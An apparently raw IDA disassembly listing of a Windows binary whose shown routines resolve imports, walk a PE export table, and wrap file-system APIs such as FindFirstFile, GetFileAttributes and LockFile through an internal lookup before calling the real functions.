loc_49AEC7: ; CODE XREF: sub_49ADD4+ED�j
mov eax, [ebp+var_2C]
mov ds:dword_4A2950, eax
push offset dword_49F5B4
push 2Fh
push offset off_4A2250
call sub_49AF43
add esp, 0Ch
push offset dword_49F5C4
push 2
push offset off_4A23C8
call sub_49AF43
add esp, 0Ch
push offset dword_49F5D0
push 1
push offset off_4A23D8
call sub_49AF43
add esp, 0Ch
push offset dword_49F5DC
push 3
push offset off_4A23E0
call sub_49AF43
add esp, 0Ch
push offset dword_49F5F8
push 2
push offset off_4A23F8
call sub_49AF43
add esp, 0Ch
push offset dword_49F5B4
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_4], eax
leave
retn
sub_49ADD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AF43 proc near ; CODE XREF: sub_49ADD4+107�p
; sub_49ADD4+11B�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_4], 0
push [ebp+arg_8]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_49AF6B
push [ebp+arg_8]
call ds:dword_4A275C ; LoadLibraryA
mov [ebp+var_10], eax
loc_49AF6B: ; CODE XREF: sub_49AF43+1A�j
cmp [ebp+var_10], 0
jnz short loc_49AF87
push ds:off_49F4F8
push 0DDh
push ds:off_49F4FC
call sub_49948C
loc_49AF87: ; CODE XREF: sub_49AF43+2C�j
push 1
push [ebp+var_10]
mov ecx, ds:dword_4A70D8
call sub_49C98E
mov eax, [ebp+var_10]
and eax, 0FFFh
test eax, eax
jz short loc_49AFBF
mov eax, [ebp+var_10]
and ax, 0F000h
mov [ebp+var_8], eax
push 1
push [ebp+var_8]
mov ecx, ds:dword_4A70D8
call sub_49C98E
jmp short loc_49AFC5
; ---------------------------------------------------------------------------
loc_49AFBF: ; CODE XREF: sub_49AF43+5E�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
loc_49AFC5: ; CODE XREF: sub_49AF43+7A�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
add ecx, [eax+3Ch]
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cmp dword ptr [eax], 4550h
jnz short loc_49AFE8
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
loc_49AFE8: ; CODE XREF: sub_49AF43+97�j
and [ebp+var_14], 0
jmp short loc_49AFF5
; ---------------------------------------------------------------------------
loc_49AFEE: ; CODE XREF: sub_49AF43:loc_49B082�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_49AFF5: ; CODE XREF: sub_49AF43+A9�j
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_4]
jnb loc_49B087
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_10]
call ds:dword_4A2728 ; GetProcAddress
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_49B035
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_18]
mov ecx, ds:dword_4A70D4
call sub_49C98E
loc_49B035: ; CODE XREF: sub_49AF43+D8�j
cmp [ebp+var_4], 0
jz short loc_49B082
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_4]
push [ebp+var_8]
call sub_49AC8E
add esp, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_18]
cmp eax, [ebp+var_1C]
jz short loc_49B082
cmp [ebp+var_1C], 0
jz short loc_49B082
cmp [ebp+var_18], 0
jz short loc_49B082
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_1C]
mov ecx, ds:dword_4A70D4
call sub_49C98E
loc_49B082: ; CODE XREF: sub_49AF43+F6�j
; sub_49AF43+119�j ...
jmp loc_49AFEE
; ---------------------------------------------------------------------------
loc_49B087: ; CODE XREF: sub_49AF43+B8�j
cmp [ebp+arg_8], offset dword_49F5B4
jnz short locret_49B0BA
cmp [ebp+var_4], 0
jz short locret_49B0BA
push offset aWritefile ; "WriteFile"
push [ebp+var_4]
push [ebp+var_8]
call sub_49AC8E
add esp, 0Ch
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short locret_49B0BA
mov eax, [ebp+var_20]
mov ds:dword_4A27BC, eax
locret_49B0BA: ; CODE XREF: sub_49AF43+14B�j
; sub_49AF43+151�j ...
leave
retn
sub_49AF43 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B0BC proc near ; CODE XREF: _4:0048E715�p
push ebp
mov ebp, esp
push 0
call sub_49B0C8
pop ebp
retn
sub_49B0BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B0C8 proc near ; CODE XREF: sub_40CAF1+478�p
; sub_40D3A5+DF�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA00
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_4A70B8
call ds:dword_4A26C4 ; RtlEnterCriticalSection
mov ds:byte_4A70D0, 1
push 0
call sub_49AC54
and [ebp+var_4], 0
call sub_4981C3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49B138
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 1
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49B134
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_49B134: ; CODE XREF: sub_49B0C8+5F�j
or [ebp+var_4], 0FFFFFFFFh
loc_49B138: ; CODE XREF: sub_49B0C8+4B�j
mov [ebp+var_4], 2
call sub_4956D0
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49B16D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49B169
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_49B169: ; CODE XREF: sub_49B0C8+94�j
or [ebp+var_4], 0FFFFFFFFh
loc_49B16D: ; CODE XREF: sub_49B0C8+80�j
mov [ebp+var_4], 4
push [ebp+arg_0]
call ds:dword_4A26C8 ; ExitProcess
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49B1B6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 5
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49B1A2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_49B1A2: ; CODE XREF: sub_49B0C8+CD�j
push [ebp+arg_0]
call ds:dword_4A26E4 ; GetCurrentProcess
push eax
call ds:dword_4A2798 ; TerminateProcess
or [ebp+var_4], 0FFFFFFFFh
loc_49B1B6: ; CODE XREF: sub_49B0C8+B9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_49B0C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B1C7 proc near ; CODE XREF: sub_40AB7C+22�p
; sub_40B56C+27�p
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push offset dword_49F5B4
push offset aSearchpatha_0 ; "SearchPathA"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0
jnz short loc_49B20D
push 0
xor edx, edx
mov ecx, [ebp+arg_4]
call sub_4929D2
test eax, eax
jz short loc_49B20D
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_4A2708 ; GetFullPathNameA
jmp short locret_49B222
; ---------------------------------------------------------------------------
loc_49B20D: ; CODE XREF: sub_49B1C7+20�j
; sub_49B1C7+30�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_4]
locret_49B222: ; CODE XREF: sub_49B1C7+44�j
leave
retn 18h
sub_49B1C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B226 proc near ; DATA XREF: _6:004A2360�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA48
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_49B296
push 104h
call sub_49935A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_4]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
loc_49B296: ; CODE XREF: sub_49B226+35�j
cmp [ebp+arg_0], 0
jnz short loc_49B2D3
push 0
xor edx, edx
mov ecx, [ebp+var_20]
call sub_4929D2
test eax, eax
jz short loc_49B2D3
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_4A270C ; GetFullPathNameW
push 0FFFFFFFFh
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_49B323
; ---------------------------------------------------------------------------
loc_49B2D3: ; CODE XREF: sub_49B226+74�j
; sub_49B226+84�j
push offset dword_49F5B4
push offset aSearchpathw ; "SearchPathW"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_1C], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_49B323
; ---------------------------------------------------------------------------
loc_49B311: ; DATA XREF: _5:0049FA50�o
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_49B323: ; CODE XREF: sub_49B226+AB�j
; sub_49B226+E9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_49B226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B334 proc near ; CODE XREF: sub_406387+201�p
; sub_408EE5+3D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_49063E
test eax, eax
jnz short loc_49B35A
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26D0 ; FindFirstFileA
mov [ebp+var_4], eax
loc_49B35A: ; CODE XREF: sub_49B334+15�j
mov eax, [ebp+var_4]
leave
retn 8
sub_49B334 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B361 proc near ; DATA XREF: _6:004A2300�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0049B496 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA58
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_49063E
test eax, eax
jnz short loc_49B416
and [ebp+var_164], 0
push offset dword_49F5B4
push offset aFindfirstfilew ; "FindFirstFileW"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_49B475
; ---------------------------------------------------------------------------
loc_49B416: ; CODE XREF: sub_49B361+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
loc_49B475: ; CODE XREF: sub_49B361+B3�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49B480
jmp short loc_49B496
sub_49B361 endp
; =============== S U B R O U T I N E =======================================
sub_49B480 proc near ; CODE XREF: sub_49B361+118�p
; DATA XREF: _5:0049FA60�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_4993DD
pop ecx
retn
sub_49B480 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49B361
loc_49B496: ; CODE XREF: sub_49B361+11D�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_49B361
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B4AA proc near ; DATA XREF: _6:004A2308�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0049B5EB SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA68
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_49063E
test eax, eax
jnz short loc_49B56B
and [ebp+var_164], 0
push offset dword_49F5B4
push offset aFindfirstfilee ; "FindFirstFileExW"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_49B5CA
; ---------------------------------------------------------------------------
loc_49B56B: ; CODE XREF: sub_49B4AA+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_8]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_8]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
loc_49B5CA: ; CODE XREF: sub_49B4AA+BF�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49B5D5
jmp short loc_49B5EB
sub_49B4AA endp
; =============== S U B R O U T I N E =======================================
sub_49B5D5 proc near ; CODE XREF: sub_49B4AA+124�p
; DATA XREF: _5:0049FA70�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_4993DD
pop ecx
retn
sub_49B5D5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49B4AA
loc_49B5EB: ; CODE XREF: sub_49B4AA+129�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_49B4AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B5FF proc near ; CODE XREF: sub_406387+5EC�p
; sub_408EE5+C0�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_490818
test eax, eax
jnz short loc_49B61F
push [ebp+arg_0]
call ds:dword_4A26CC ; FindClose
mov [ebp+var_4], eax
loc_49B61F: ; CODE XREF: sub_49B5FF+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_49B5FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B626 proc near ; CODE XREF: sub_406387+212�p
; sub_406387+5DB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4906DE
test eax, eax
jnz short loc_49B650
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26D4 ; FindNextFileA
mov [ebp+var_4], eax
loc_49B650: ; CODE XREF: sub_49B626+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_49B626 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B657 proc near ; DATA XREF: _6:004A2320�o
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 148h
push esi
push edi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_144]
push eax
push [ebp+arg_0]
call sub_4906DE
test eax, eax
jnz short loc_49B6A8
and [ebp+var_148], 0
push offset dword_49F5B4
push offset aFindnextfilew ; "FindNextFileW"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_148], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_148]
mov [ebp+var_4], eax
jmp short loc_49B707
; ---------------------------------------------------------------------------
loc_49B6A8: ; CODE XREF: sub_49B657+20�j
lea ecx, [ebp+var_118]
lea eax, [ebp+var_144]
sub ecx, eax
lea esi, [ebp+var_144]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_118]
push eax
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
loc_49B707: ; CODE XREF: sub_49B657+4F�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn 8
sub_49B657 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B710 proc near ; DATA XREF: _6:004A2390�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_491858
test eax, eax
jnz short loc_49B73A
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26FC ; GetFileInformationByHandle
mov [ebp+var_4], eax
loc_49B73A: ; CODE XREF: sub_49B710+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_49B710 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B741 proc near ; DATA XREF: _6:004A2398�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_491950
test eax, eax
jnz short loc_49B76F
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2768 ; LockFile
mov [ebp+var_4], eax
jmp short loc_49B776
; ---------------------------------------------------------------------------
loc_49B76F: ; CODE XREF: sub_49B741+12�j
mov [ebp+var_4], 1
loc_49B776: ; CODE XREF: sub_49B741+2C�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_49B741 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B77D proc near ; DATA XREF: _6:004A23A0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_491950
test eax, eax
jnz short loc_49B7A8
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A279C ; UnlockFile
jmp short locret_49B7AB
; ---------------------------------------------------------------------------
loc_49B7A8: ; CODE XREF: sub_49B77D+12�j
push 1
pop eax
locret_49B7AB: ; CODE XREF: sub_49B77D+29�j
leave
retn 14h
sub_49B77D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B7AF proc near ; CODE XREF: sub_4060D0+110�p
; sub_40AC42+10F�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_492CA8
test eax, eax
jnz short loc_49B7CD
push [ebp+arg_0]
call ds:dword_4A26F4 ; GetFileAttributesA
jmp short locret_49B7D9
; ---------------------------------------------------------------------------
loc_49B7CD: ; CODE XREF: sub_49B7AF+11�j
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
locret_49B7D9: ; CODE XREF: sub_49B7AF+1C�j
leave
retn 4
sub_49B7AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B7DD proc near ; DATA XREF: _6:004A226D�o
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0049B896 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA78
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_49B85E
lea edx, [ebp+var_28]
mov ecx, [ebp+var_20]
call sub_492CA8
test eax, eax
jnz short loc_49B86C
loc_49B85E: ; CODE XREF: sub_49B7DD+70�j
push [ebp+arg_0]
call ds:dword_4A26F8 ; GetFileAttributesW
mov [ebp+var_1C], eax
jmp short loc_49B87B
; ---------------------------------------------------------------------------
loc_49B86C: ; CODE XREF: sub_49B7DD+7F�j
movzx eax, [ebp+var_28]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov [ebp+var_1C], eax
loc_49B87B: ; CODE XREF: sub_49B7DD+8D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49B886
jmp short loc_49B896
sub_49B7DD endp
; =============== S U B R O U T I N E =======================================
sub_49B886 proc near ; CODE XREF: sub_49B7DD+A2�p
; DATA XREF: _5:0049FA80�o
mov eax, [ebp-20h]
mov [ebp-30h], eax
push dword ptr [ebp-30h]
call sub_4993DD
pop ecx
retn
sub_49B886 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49B7DD
loc_49B896: ; CODE XREF: sub_49B7DD+A7�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_49B7DD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B8AA proc near ; DATA XREF: _6:004A2275�o
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0049B9D8 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA88
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
mov [ebp+var_28], eax
lea edx, [ebp+var_24]
mov ecx, [ebp+var_20]
call sub_492CA8
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_49B995
mov [ebp+var_1C], 1
movzx eax, [ebp+var_24]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+4], ecx
mov [edx+8], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+0Ch], ecx
mov [edx+10h], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
